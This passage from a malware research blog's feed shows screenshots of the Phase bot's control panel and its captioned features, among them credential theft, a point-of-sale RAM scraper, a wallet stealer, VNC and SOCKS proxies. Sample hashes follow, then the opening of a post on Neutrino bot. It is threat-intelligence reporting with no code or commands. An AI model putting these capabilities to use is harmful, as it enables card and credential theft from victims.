&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLtYDo_slVU5mCXXPPd5HggXjceA8TTwuWcn7N91DjiUEenROfwlPK3XpDvqfw6iHRsoBFuPrLxLc0E9O-thowE3638X7vgvDOvp-9pwNhBqrotNwxb25I72VHacn8HSch30-VlcKr1m0/s1600/2014-12-13_11-30-57.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLtYDo_slVU5mCXXPPd5HggXjceA8TTwuWcn7N91DjiUEenROfwlPK3XpDvqfw6iHRsoBFuPrLxLc0E9O-thowE3638X7vgvDOvp-9pwNhBqrotNwxb25I72VHacn8HSch30-VlcKr1m0/s1600/2014-12-13_11-30-57.png&quot; height=&quot;380&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
So weak that this is even vulnerable to xss.&lt;br /&gt;
&lt;br /&gt;
Master balance ?  less than &amp;lt; 1k&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdwPQuKF7Sai_5IgIpfP5iEAAFIHg_ZxcEB9sjqlHvt4tuI1jEV0JUupTxd9FPMWvJKg944r09NHy7MVGMRrttGPtTDdXal19btzYooOq7GcGgTVyYqEODpQjg2P9fAMnKPIXhapuPrS4/s1600/2014-12-13_11-35-02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdwPQuKF7Sai_5IgIpfP5iEAAFIHg_ZxcEB9sjqlHvt4tuI1jEV0JUupTxd9FPMWvJKg944r09NHy7MVGMRrttGPtTDdXal19btzYooOq7GcGgTVyYqEODpQjg2P9fAMnKPIXhapuPrS4/s1600/2014-12-13_11-35-02.png&quot; height=&quot;83&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Phase seem not so popular, and got also rapidly lynched by other actors on forums.&lt;br /&gt;
&lt;br /&gt;
Anyway let&#39;s have a look on the web panel.&lt;br /&gt;
Login:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjSL23DBrRsKS4PBVbV5dUsIXR2UlIWIuPhkmp9vYTNoqeYcqkVpZLa5CkevdqoQwmK2PW7YbEV3RPkhPwh3Q_lDUatJRqMhT9-a32r3-lRYRhRTyWnnN_C2LYKW2lQQGbAN00vbC-n_4/s1600/2014-12-09_18-31-34.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjSL23DBrRsKS4PBVbV5dUsIXR2UlIWIuPhkmp9vYTNoqeYcqkVpZLa5CkevdqoQwmK2PW7YbEV3RPkhPwh3Q_lDUatJRqMhT9-a32r3-lRYRhRTyWnnN_C2LYKW2lQQGbAN00vbC-n_4/s1600/2014-12-09_18-31-34.png&quot; height=&quot;400&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Dashboard:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIEXJNd2k3StECrOIocAOsTorOZU-p3oCfRtPQg-CyGjgr3b_VoifFip7wZ36rDgKtVdsdrWjFtnibDt11hZSRt1csDBjSkshfc3yubMn0QonKaI3qC9V0xo1PPMOV41qlxczuA5rzu1E/s1600/2014-12-09_18-32-55.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIEXJNd2k3StECrOIocAOsTorOZU-p3oCfRtPQg-CyGjgr3b_VoifFip7wZ36rDgKtVdsdrWjFtnibDt11hZSRt1csDBjSkshfc3yubMn0QonKaI3qC9V0xo1PPMOV41qlxczuA5rzu1E/s1600/2014-12-09_18-32-55.png&quot; height=&quot;218&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Commands:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFv2n-_DLb_URtNDkrp6GVCn7GlrYdyT75NKFje_hMZm4PdOGP3hcrf1eZCWer9SJRDChjy7btWUvJ4VmBmHf8syYEXs2A0ne_BddkDFisZJK-4N6i6QakyG7myereYIow3iE5Fg42UEE/s1600/2014-12-09_18-34-49.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFv2n-_DLb_URtNDkrp6GVCn7GlrYdyT75NKFje_hMZm4PdOGP3hcrf1eZCWer9SJRDChjy7btWUvJ4VmBmHf8syYEXs2A0ne_BddkDFisZJK-4N6i6QakyG7myereYIow3iE5Fg42UEE/s1600/2014-12-09_18-34-49.png&quot; height=&quot;640&quot; width=&quot;343&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Botlist:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1P7N0sU-9-JFg5cLW6nylvWZHoWYJLxdUhMT1xtJO_6AXft8uGxPOvGKeM-wXRczIliHkZZr9q979MQMaZ9v5VzNKPkKlCogwW51aL3jL2VvpRQNXhMa7z-udIfz8er67Py6I4-Teuf0/s1600/2014-12-09_18-35-48.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1P7N0sU-9-JFg5cLW6nylvWZHoWYJLxdUhMT1xtJO_6AXft8uGxPOvGKeM-wXRczIliHkZZr9q979MQMaZ9v5VzNKPkKlCogwW51aL3jL2VvpRQNXhMa7z-udIfz8er67Py6I4-Teuf0/s1600/2014-12-09_18-35-48.png&quot; height=&quot;201&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Credentials:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt2kIP5swL71TVxFvXLCBSX1E2ztVuDCmfkN17CypTYpLo0BMArk9FUVrwb8_wqCDzE6wu0XWVKJBmPkoD2T12VsiKaNgqsq6qy06jzCtNdu4AKFUslao3Qq7xyloSZuwkSGr4fJRIIsI/s1600/2014-12-09_18-36-48.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt2kIP5swL71TVxFvXLCBSX1E2ztVuDCmfkN17CypTYpLo0BMArk9FUVrwb8_wqCDzE6wu0XWVKJBmPkoD2T12VsiKaNgqsq6qy06jzCtNdu4AKFUslao3Qq7xyloSZuwkSGr4fJRIIsI/s1600/2014-12-09_18-36-48.png&quot; height=&quot;201&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Socks5:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBQK2neOIQ7Z1UgBtIMWYu3QD6XuG7on-gsRG2UtBs9APIzt6dOSXAhewdh1pHmj5w9ScNT61rZHds1RsYovXtQBntikYiprPuUOParSpcWXbmwNGNk_itYdCv0MOC_J5_5Iht_xJbhHQ/s1600/2014-12-09_18-37-11.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBQK2neOIQ7Z1UgBtIMWYu3QD6XuG7on-gsRG2UtBs9APIzt6dOSXAhewdh1pHmj5w9ScNT61rZHds1RsYovXtQBntikYiprPuUOParSpcWXbmwNGNk_itYdCv0MOC_J5_5Iht_xJbhHQ/s1600/2014-12-09_18-37-11.png&quot; height=&quot;201&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Browsers:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSw7xl98_ubkR8vwruOb8OT_ydMeJT0GyG7dJ3uM2_MbwOazaoN_UXAQF5RCBVkK8U_TZHlBYZHYuzT8Tt6gRcDmxBu9JeHjFV8Edh-upKp01_etFVxddg25j2dZrC1aqKJvZMhL-mn0k/s1600/2014-12-09_18-37-37.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSw7xl98_ubkR8vwruOb8OT_ydMeJT0GyG7dJ3uM2_MbwOazaoN_UXAQF5RCBVkK8U_TZHlBYZHYuzT8Tt6gRcDmxBu9JeHjFV8Edh-upKp01_etFVxddg25j2dZrC1aqKJvZMhL-mn0k/s1600/2014-12-09_18-37-37.png&quot; height=&quot;201&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Modules:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbsCr9F_EYXLmlt_bvBTp0-tXiD-bAzrlVZqFc1Zq-Y6jqqtw88CxoiNGwGcIrCoGDHmYwH_OCHa5JoZaEhcgPFD4CDD-iWqIXVbwLuISYKnmIDdzUzrOd1-iJUS67qoypKkLZ_rxhm3w/s1600/2014-12-09_18-38-24.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbsCr9F_EYXLmlt_bvBTp0-tXiD-bAzrlVZqFc1Zq-Y6jqqtw88CxoiNGwGcIrCoGDHmYwH_OCHa5JoZaEhcgPFD4CDD-iWqIXVbwLuISYKnmIDdzUzrOd1-iJUS67qoypKkLZ_rxhm3w/s1600/2014-12-09_18-38-24.png&quot; height=&quot;246&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Analyzer detector:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6D8d1XD3TSj0Z67geI7VghxvgYDN9SvISkAahjP1KCtbaeiRtXPF0-PKG13hT8byCdCOgTkZ0AqxmBfxcNhClUYAwoY2kLA_GFwUDjO8OVmdUZyFE8ksZ5KjlVwN6n6G6qoIm3Mvnl1A/s1600/2014-12-09_18-38-49.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6D8d1XD3TSj0Z67geI7VghxvgYDN9SvISkAahjP1KCtbaeiRtXPF0-PKG13hT8byCdCOgTkZ0AqxmBfxcNhClUYAwoY2kLA_GFwUDjO8OVmdUZyFE8ksZ5KjlVwN6n6G6qoIm3Mvnl1A/s1600/2014-12-09_18-38-49.png&quot; height=&quot;185&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
RDP:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNfW9IYY2WLCoeY5OOYPo-YnHzw7DrZSu9Xt0Gs6yFI3J8UuQFFPAsspedsvQZkL8SasQ_2-wUNaPKk4ci4SH0K03S0c-OcwKFdikpLrGQ1e-ekI6deohKa1VNY_xL1oVWh80S4NGginA/s1600/2014-12-09_18-39-46.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNfW9IYY2WLCoeY5OOYPo-YnHzw7DrZSu9Xt0Gs6yFI3J8UuQFFPAsspedsvQZkL8SasQ_2-wUNaPKk4ci4SH0K03S0c-OcwKFdikpLrGQ1e-ekI6deohKa1VNY_xL1oVWh80S4NGginA/s1600/2014-12-09_18-39-46.png&quot; height=&quot;185&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Settings:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpQjn_PJImcVnASjY2H1u70UBgHkOrYOIlyD7Z7_tXExsBPWv0TnSfkwr8RfSQ11jzFveGCfI35ehn1hjUMfMGA-6Q_B9PJ_izlOpI0PSZ4eiGe1NoRz7jI4V4oWFQBLYEgMoA4LPT5i4/s1600/2014-12-09_18-40-17.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpQjn_PJImcVnASjY2H1u70UBgHkOrYOIlyD7Z7_tXExsBPWv0TnSfkwr8RfSQ11jzFveGCfI35ehn1hjUMfMGA-6Q_B9PJ_izlOpI0PSZ4eiGe1NoRz7jI4V4oWFQBLYEgMoA4LPT5i4/s1600/2014-12-09_18-40-17.png&quot; height=&quot;238&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
FAQ:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd4OqCRjUwG_zKp5U7HA8p7eFZx_RTmoLabyUtkIKWMsAolg2DEAO4ZHGXWehwHcSifWtg3_jTEm-D5FLOB67sX-hvXa4B1aPWqk7qRl_9RoG9ShB4UWfZEBza7K8wxNFnP_Z4IXKJ63M/s1600/2014-12-09_18-41-16.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd4OqCRjUwG_zKp5U7HA8p7eFZx_RTmoLabyUtkIKWMsAolg2DEAO4ZHGXWehwHcSifWtg3_jTEm-D5FLOB67sX-hvXa4B1aPWqk7qRl_9RoG9ShB4UWfZEBza7K8wxNFnP_Z4IXKJ63M/s1600/2014-12-09_18-41-16.png&quot; height=&quot;640&quot; width=&quot;376&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Structure:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfW-3e4rn7nRY6YXM5gENGri8orH3sjwRFS7tFNPq0N6jI9THmBCVUi9MAP4wm6RlgjtSp-xOsr3fd3Zso04DfSzCGIRWGiJFC7y4LfnysnhGrb6nA7GarDBPeDskHT-e1WavQDRemgUs/s1600/2014-12-10_17-10-39.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfW-3e4rn7nRY6YXM5gENGri8orH3sjwRFS7tFNPq0N6jI9THmBCVUi9MAP4wm6RlgjtSp-xOsr3fd3Zso04DfSzCGIRWGiJFC7y4LfnysnhGrb6nA7GarDBPeDskHT-e1WavQDRemgUs/s1600/2014-12-10_17-10-39.png&quot; height=&quot;112&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
In the wild panel, having Ram scrapper plugin + VNC:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgosB_f7TvNaTdmPPKD1Jlt01WTnmi_O7KW1oBZOuIcx675giVAnmaF4pRHss4TzehNl3dWlcE2zX8H0HQ16hG1aGWD9dmfrMbuINaoCXz7x60FWDqlOLpRBick4QeYuITvT0dotoGEqm4/s1600/2014-12-13_14-57-05.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgosB_f7TvNaTdmPPKD1Jlt01WTnmi_O7KW1oBZOuIcx675giVAnmaF4pRHss4TzehNl3dWlcE2zX8H0HQ16hG1aGWD9dmfrMbuINaoCXz7x60FWDqlOLpRBick4QeYuITvT0dotoGEqm4/s1600/2014-12-13_14-57-05.png&quot; height=&quot;295&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Ram scrapper plugin:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzUk2PNznjrsFEKia6bD7dH2ZzsQX3-ve-rD72K4L5jdsQxotJcooErk1XV5et9ej6OXdQcHW-8SQdcGqWCACt-o3lG-eBemG-ApM7ntqyothesTWJ3mIWqIcrqqlIynpiXsExoHzrSes/s1600/2014-12-13_19-52-13.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzUk2PNznjrsFEKia6bD7dH2ZzsQX3-ve-rD72K4L5jdsQxotJcooErk1XV5et9ej6OXdQcHW-8SQdcGqWCACt-o3lG-eBemG-ApM7ntqyothesTWJ3mIWqIcrqqlIynpiXsExoHzrSes/s1600/2014-12-13_19-52-13.png&quot; height=&quot;190&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
Point-of-sale remote controlled:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpc9_6RJriyAskiLLleLbyrBG1wuYB3IpRDLS2vL_xV9yohu-5dQTTc0KgGuTIAWme4s8IIGSJi_L2vqYCMrpexrPDCu-7hp879yDZWW-vjvVEa1dmk35PpxnFstUfE2r_OLaS84tn01g/s1600/2014-12-13_18-46-46.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpc9_6RJriyAskiLLleLbyrBG1wuYB3IpRDLS2vL_xV9yohu-5dQTTc0KgGuTIAWme4s8IIGSJi_L2vqYCMrpexrPDCu-7hp879yDZWW-vjvVEa1dmk35PpxnFstUfE2r_OLaS84tn01g/s1600/2014-12-13_18-46-46.png&quot; height=&quot;291&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Another botnet with hacked point of sale remote controlled:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIlg_7I3yofdUsq4Wns375SzwW3DDtMzj4rAf-IKn8R07GUBfuZukJDM1H4JWa5eKE7_HkgIGgIGfS5TscfrTZi0Tz4q6jO3ZwLr13O162nzH_3Gz3WHVwtRZ_Cg7wuB7qN3KhMhVmcZA/s1600/2014-12-15_10-07-20.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIlg_7I3yofdUsq4Wns375SzwW3DDtMzj4rAf-IKn8R07GUBfuZukJDM1H4JWa5eKE7_HkgIGgIGfS5TscfrTZi0Tz4q6jO3ZwLr13O162nzH_3Gz3WHVwtRZ_Cg7wuB7qN3KhMhVmcZA/s1600/2014-12-15_10-07-20.png&quot; height=&quot;296&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Wallet stealer:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4tFdUGWsHRl-gj29E4oFwteq-SdJVzjn9mwr1nHC_R8_sDSShyXCUuJDTcCsgAf15tdo0Qo0qDv2ZY4PpfVdjCOJUOvJEzo4_Hnjav9f6U22cKuQGJW02vgUCJPr_9cHO0OyetdREbe8/s1600/2014-12-17_02-42-38.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4tFdUGWsHRl-gj29E4oFwteq-SdJVzjn9mwr1nHC_R8_sDSShyXCUuJDTcCsgAf15tdo0Qo0qDv2ZY4PpfVdjCOJUOvJEzo4_Hnjav9f6U22cKuQGJW02vgUCJPr_9cHO0OyetdREbe8/s1600/2014-12-17_02-42-38.png&quot; height=&quot;222&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Phase samples:&lt;br /&gt;
ae7a56b3adf6f7684ba14a77c017904d&lt;br /&gt;
12dccdec47928e5298055996415a94f2&lt;br /&gt;
d1446326bf1c69ea9df6e65bd472f358&lt;br /&gt;
1f3e808a3ccd981f3e61de227dae93b8&lt;br /&gt;
6ce0bb4cd86295f915160d7207a07a47&lt;br /&gt;
5767b9bf9cb6f2b5259f29dd8b873e36&lt;br /&gt;
a10f84153dba7b73980f0ff50d8cc8e6&lt;br /&gt;
f8ffcab3324561598ce5c375c07066be&lt;br /&gt;
e4574fbc1014d27e1b6906bfc5351e0e&lt;br /&gt;
d2ed20b1996e7e5bad2b91fd255732ef&lt;br /&gt;
f89b4e626c7a81544ca7395be3262cf6&lt;br /&gt;
ef69575e14fa965380242db26675d2df&lt;br /&gt;
fc586c3ec37e51668e905d0acfc913f6&lt;br /&gt;
eb9b56d829c3951b6e9cb5e4a651f7c8 &lt;br /&gt;
6f53d3cd1acb7541bcc7399c4af001b1&lt;br /&gt;
19fa3927577571c51428f6eee2b5f52f &lt;br /&gt;
4ec84f1aa91e4cdc12118002244ca582&lt;br /&gt;
20e3a9ec396ad8b57a36ea3c6b9f151a&lt;br /&gt;
fe5dfa53204a65eca741ceab352c3b00&lt;br /&gt;
ace0a059dc2264c847d4e6c91f829dfd &lt;br /&gt;
f01c1ea73e968c2309391dcf3f0a2848&lt;br /&gt;
&lt;br /&gt;
Unencrypted Ram scrapper plugin: 1e18ee52d6f0322d065b07ec7bfcbbe8&lt;br /&gt;
Unencrypted VNC plugin: 94eefdce643a084f95dd4c91289c3cf0&lt;br /&gt;
Panel: c43933e7c8b9d4c95703f798b515b384 (With a small trendMicro signature fail &quot;PHP_SORAYA.A&quot; no this is not the Soraya panel.&lt;br /&gt;
Needless to say the panel was also &lt;a href=&quot;http://www.malwaretech.com/2014/12/phase-bot-exploiting-c-panel.html&quot;&gt;vulnerable&lt;/a&gt;. </description><link>https://www.xylibox.com/2015/01/phase-win32phasebot-a.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0JheIjlO2Yj0mTQFhMmc80QXWJiZ_qydp4tvfH5f7KO533rzHLUTD79ti_SYafZm8O6_-xqHGY994vVK5NohU1-5Ei2Y4OtYSn0wIm487UOd-IRZZrJafaKbvgKGnlr3gyQdOM9JPDO4/s72-c/2014-12-09_18-52-06.png" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-304183291808741055</guid><pubDate>Mon, 12 Jan 2015 20:48:00 +0000</pubDate><atom:updated>2015-01-12T21:49:04.565+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Neutrino bot</category><title>Neutrino bot</title><description>Neutrino bot is a malware who appeared and vanished quickly like &lt;a href=&quot;http://www.xylibox.com/2015/01/phase-win32phasebot-a.html&quot;&gt;Phase&lt;/a&gt;.&lt;br /&gt;
not worth the look anyway. &lt;br /&gt;
&lt;br /&gt;
Advert:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEU_4r8zqbFksVyFYmD7ns3oUlcYz3LmdVEEUVYIlYABcqJxL0srOKu7SWplTyqFeMOEVahLkSBNczWLTNzL8nFpdHsUI5MG2ieAvmpbBgPL9r6DeottgaOB2Kf9TAm83qfdRYMT4jPiQ/s1600/2014-05-31_13-27-32.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEU_4r8zqbFksVyFYmD7ns3oUlcYz3LmdVEEUVYIlYABcqJxL0srOKu7SWplTyqFeMOEVahLkSBNczWLTNzL8nFpdHsUI5MG2ieAvmpbBgPL9r6DeottgaOB2Kf9TAm83qfdRYMT4jPiQ/s1600/2014-05-31_13-27-32.png&quot; height=&quot;640&quot; width=&quot;476&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Login:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh77yf7PxH_6hUEJOp-5pxbz2IAwQGKZ5DPwrzrLnrlEPtasnphcIMmUXRLSHToLJgNQQ8rJF2Bpr1Y-gTO6YWBMCKpzveHIeDjiYZAExLBBgBjoYTlr6nxMSyN6vibMTXT1TEetiAFUy4/s1600/2014-05-31_13-04-18.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh77yf7PxH_6hUEJOp-5pxbz2IAwQGKZ5DPwrzrLnrlEPtasnphcIMmUXRLSHToLJgNQQ8rJF2Bpr1Y-gTO6YWBMCKpzveHIeDjiYZAExLBBgBjoYTlr6nxMSyN6vibMTXT1TEetiAFUy4/s1600/2014-05-31_13-04-18.png&quot; height=&quot;200&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Task:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-tUUVlWkFAI7SwSqdKcaoqIFuyE-kccNT3GVNtTNxuES_8bxztAqskPjFbi5rlsaB-u5sdjdr9jBFvTC_csASTxiDG2EeTtm4FSo_IFIFvxLAVhA-ONlt-LV775o0o6C2LZN3ZH430o/s1600/2014-05-31_13-05-49.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-tUUVlWkFAI7SwSqdKcaoqIFuyE-kccNT3GVNtTNxuES_8bxztAqskPjFbi5rlsaB-u5sdjdr9jBFvTC_csASTxiDG2EeTtm4FSo_IFIFvxLAVhA-ONlt-LV775o0o6C2LZN3ZH430o/s1600/2014-05-31_13-05-49.png&quot; height=&quot;222&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
